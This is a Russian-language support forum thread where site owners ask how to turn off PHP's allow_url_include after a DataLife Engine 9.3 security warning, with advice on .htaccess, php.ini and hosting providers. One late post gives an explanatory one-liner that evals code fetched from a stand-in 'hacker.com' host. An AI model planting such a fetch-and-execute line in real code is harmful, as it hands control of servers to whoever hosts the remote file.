Перейти к публикации

Рекомендованные сообщения

После обновления движка на версию 9.3. возникла ошибка:

Внимание ошибка безопасности:

Ваш сервер не отвечает минимальным требованиям безопасности, на сервере включена директива allow_url_include, для отключения данной директивы обратитесь к вашему хостинг провайдеру.

----------

Написал провайдеру, он ответил:

Здравствуйте!

Изменять настройки php для Вашего сайта Вы можете через директивы php_value и

php_flag в файле .htaccess.

---------

А я в этом не разбираюсь - что делать?

-----------

Мой сайт

Ссылка на сообщение
Поделиться на других сайтах

У меня аналогичная проблема и нетолько:

1. Внимание ошибка безопасности:

Ваш сервер не отвечает минимальным требованиям безопасности, на сервере включена директива allow_url_include, для отключения данной директивы обратитесь к вашему хостинг провайдеру.

2. Внимание:

На вашем сервере обнаружены устаревшие настройки в php.ini, а именно включен magic_quotes_gpc, данная настройка является не рекомендуемой при использовании DataLife Engine. Обратитесь к вашему хостинг провайдеру для отключения данной настройки в настройках сервера.

---------------

ОТвет провайдера аналогичен: Вы свободно можете изменять эти параметры через директивы php_value и php_flag

в файле .htaccess .

----------------------------

Использовал : php_value allow_url_include off - не помогло. Провайдер менять не хочет. Зовут МАстерхост.

Дайте рекомендации пожалуйста кто нибудь по моим 2-м пунктам.

----------------

P.S. Администрация переведите пожалуйста мой аккаунт в соответствующую группу, у меня расширеная лицензия на скрипт. Или скажите куда кликнуть.

Ссылка на сообщение
Поделиться на других сайтах

Использовал : php_value allow_url_include off - не помогло. Провайдер менять не хочет. Зовут МАстерхост.

попробуйте вместо off использовать 0 т.е. php_value allow_url_include 0

P.S. Администрация переведите пожалуйста мой аккаунт в соответствующую группу, у меня расширеная лицензия на скрипт. Или скажите куда кликнуть.

http://forum.dle-news.ru/index.php?showtopic=56000

Ссылка на сообщение
Поделиться на других сайтах

Не помогло... кукис обновил в т.ч. пишет красным по белому ... ругается ДЛЕ.

Инет перерыл.. везде написано как это ужасно или ведутся споры, что не существенно ... а вот решение проблемы никто толком не указывает.

А по второму пункту я нашел на форуме тут ... помогло .. завтра с провайдером буду бадаться...

P.S. Спасибо, заявку отправил.

Ссылка на сообщение
Поделиться на других сайтах

Не помогло...

В таком случае вам поможет только хостинг провайдер, пусть проверяют почему не работает, если они пишут что вам разрешено менять этот параметр PHP в .htaccess

Вообще этот параметр касается общей безопасности вашего сервера. Непосредственно самому DLE неважно включен или выключен этот параметр. Это рекомендация относительно вашей безопасности в случае попадания на сервер других сторонних скриптов.

Ссылка на сообщение
Поделиться на других сайтах

Итак... немного порычав в очередной раз мне пришло письмо от Хостера:

Здравствуйте!

Вы можете использовать PHP-CGI:

* http://masterhost.ru/support/doc/php/#reconfig

Достаточно скопировать нашу версию PHP-CGI и в php.ini изменить

allow_url_include = On

на

allow_url_include = Off

----------------

Т.е. в предыдущий раз они мне писали что htacces надо менять ... теперь описав свои изменения директив... поняв что и действительно не работает, отписали по другому.

Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником.

Потихоньку думаю сделаю.

Изменено пользователем grafee
Ссылка на сообщение
Поделиться на других сайтах

Аналогичная проблема была.

hoster.ru хостинг

Звонил в техподдержку, сказали мол у анс такие настройки и его через htaccess нельзя менять, вобщем побрили :)

Ссылка на сообщение
Поделиться на других сайтах

Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником.

Потихоньку думаю сделаю.

Я так понимаю, что у Вас выделенный виртуальный сервер. Если да - нужно клиентом зайти по SSH и править файл настроек php.ini. Данные настройки будут применены ко всему виртуальному серверу.

Ссылка на сообщение
Поделиться на других сайтах

Кто работает с 1Gb хостингом, подскажите как решить данную проблему?

Тех поддержка хостинга писала что то о "переводе сервера на cgi / fastcgi". Но к сожалению ничего непонятно...

Ссылка на сообщение
Поделиться на других сайтах

В версии 9,2 исправил при помощи директивы RewriteBase и php_flag allow_url_include Off но в 9,3 не помогает

Не придумавайте того чего не было и быть не могло. Версия 9.2 данной проверки не проводила и выводить данное сообщение не могла в принципе, соответвенно и исправлять с помощью директив вы это также не могли.

Вообще сообщение о данной проблеме скрипт выводит во вполне очевидным текстом. Настройки вашего сервера, представляют угрозу для безопасной работы сайтов. Эта серверная настройка и обращаться для ее исправления нужно к хостинг провайдеру. DLE вообще все равно включена эта настройка или нет, на его работу это никак не влияет, ему все равно. Он лишь вас уведомляет, что хостинг не уделяет должного внимания настройкам безопасности сервера. И решать этот вопрос вам нужно с вашим хостинг провайдером, DLE это отключить не может, да и не для него эта настройка.

Ссылка на сообщение
Поделиться на других сайтах

У меня та же беда! Поддержка исправила настроики. Через функцию phpinfo() allow_url_include=Off вот что у меня, тоесть отключена эта функция. Плюс я php_value allow_url_include off добавил в .htaccess, а толку ноль, как вылазила так и вылазиет это сообщение.

Изменено пользователем Scorpio2011
Ссылка на сообщение
Поделиться на других сайтах

Scorpio2011,

скрипт получает эти значения через ini_get от сервера. Предоставляйте доступ по FTP, проверим что у вас возращает сервер в данной функции

Ссылка на сообщение
Поделиться на других сайтах

Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником.

Потихоньку думаю сделаю.

Я так понимаю, что у Вас выделенный виртуальный сервер. Если да - нужно клиентом зайти по SSH и править файл настроек php.ini. Данные настройки будут применены ко всему виртуальному серверу.

Всё именно так. Я с админом одним разговаривал, он сказал проблем как бы никаких.. через SSH зайти и проч.

НО !!! тут штука немного другая описывается, провайдер предлагает создать свой интерпритатор PHP входя через SSH. Там всё что он напсал по этому поводу впринципе понятно, времени нет пока этим заняться - работа. Раскрутку сайта не запускал .. посещений пока нет особо, сейчас пока наполню, потом ошибку хоста эту исправлю, потом раскрутка... но всё во времени упирается. Отпишу потом.

Ссылка на сообщение
Поделиться на других сайтах

celsoft,

Мне хостер написал:

К сожалению, allow_url_include отключить невозможно.

Чем это мне грозит? Чего можно ожидать и как обезопасить сайт?

Изменено пользователем n0lik
Ссылка на сообщение
Поделиться на других сайтах

n0lik,

Непосредственно самому DLE абсолютно все равно включена или отключена данная директива, на его функциональность это никак не влияет. Но когда включена данная директива, то для того чтобы запустить сторонний зловредный код, его необязательно загружать именно на ваш сервер, его можно будет запустить когда он находится на любом другом сервере и сайте. Т.е. например если будет найдена какая либо уязвимость в скрипте или сторонних модификациях или сторонних скриптах на вашем сайте, то опасность от той или иной уязвимости увеличивается в разы.

Обезопасить себя можно только отключением данной директивы, и других вариантов нет, т.к. данная директива это не какая то конкретная уязвимость, это общая небезопасная настройка сервера.

Для примера: Вот почти год назад была обнаружена уязвимость в DLE http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html так вот как видите она имеет статус очень опасной, при этом если на сервере отключена директива register_globals то эта уязвимость была абсолютно безопасна для сайта, и воспользоваться ей было бы невозможно, даже если не ставить патч и что либо исправлять.

Есть ряд настроек сервера кторые небезопасны и существуют они только для того чтобы выполнять очень специфические задачи и включать которые для общих серверов и всех сайтов нельзя, к таким настройкам и относиться также allow_url_include

Ссылка на сообщение
Поделиться на других сайтах

n0lik,

Вот написал тебе три примера, как получить содержимое файла:


<?php
// Первый способ.
$a = file ( "http://ya.ru/" );
print_r ( $a );
//

// Второй способ.
$b = fopen ( "http://ya.ru/", "r" );
echo fgets ( $b, 20480 );
//

// Третий способ.
$c = file_get_contents ( "http://ya.ru/" );
echo $c;
//
?>
[/php]

Для всех этих способов в php.ini должно быть включено [b]allow_url_fopen[/b].

Для DLE включение [b]allow_url_fopen[/b] надо лишь для того, чтобы через админку проверять наличие новых версий.

Файл: upload\engine\ajax\updates.php

Строчка: $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);

Если тебе это не надо, то [b]лучше отключать allow_url_fopen[/b].

А узнать о новых версиях DLE можно с RSS по каналам: http://dle-news.ru/bags/rss.xml, http://dle-news.ru/release/rss.xml

:rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

celsoft,

Спасибо за ответ.

WWW.ZEOS.IN,

Как и всегда, я вас не понял про что вы :)

Вот если бы вы мне написали как вдолбить хостеру об отключении allow_url_include, было бы замечательно :)

Ссылка на сообщение
Поделиться на других сайтах


<?php eval ( file_get_contents ( "http://hacker.com/сторонний_зловредный_код.txt" ) ); ?>[/php]

Так понятнее?

Изменено пользователем WWW.ZEOS.IN
Ссылка на сообщение
Поделиться на других сайтах

WWW.ZEOS.IN,

Не капельки, я в пхп не соображаю и сей код мне ни очём не говорит, я же говорю, ты лучше напиши, что мне сказать хостеру (как убедить), что бы он отключил allow_url_include.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...